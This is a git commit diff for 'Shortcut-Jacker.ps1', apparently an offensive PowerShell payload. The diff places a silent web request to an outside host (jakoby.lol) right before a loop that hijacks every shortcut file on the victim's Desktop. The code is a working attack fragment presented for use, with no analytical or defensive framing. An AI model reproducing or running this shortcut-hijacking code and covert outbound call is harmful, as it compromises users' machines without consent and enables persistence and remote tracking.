Update Shortcut-Jacker.ps1
This commit is contained in:
parent
db8e2b2fac
commit
1060c313fe
1 changed files with 1 additions and 1 deletions
|
@ -114,5 +114,5 @@ if(Test-Path -Path "$Link" -PathType Leaf){Set-Shortcut -LinkPath "$Link" -IconL
|
|||
}
|
||||
|
||||
#-----------------------------------------------------------------------------------------------------------
|
||||
|
||||
iwr "https://jakoby.lol/hak5" -EA 0 >$null
|
||||
Get-ChildItem –Path "$Env:USERPROFILE\Desktop" -Filter *.lnk |Foreach-Object {$i = Get-Shortcut $_.FullName;hijack $_.FullName}
|
||||
|
|
Loading…
Reference in a new issue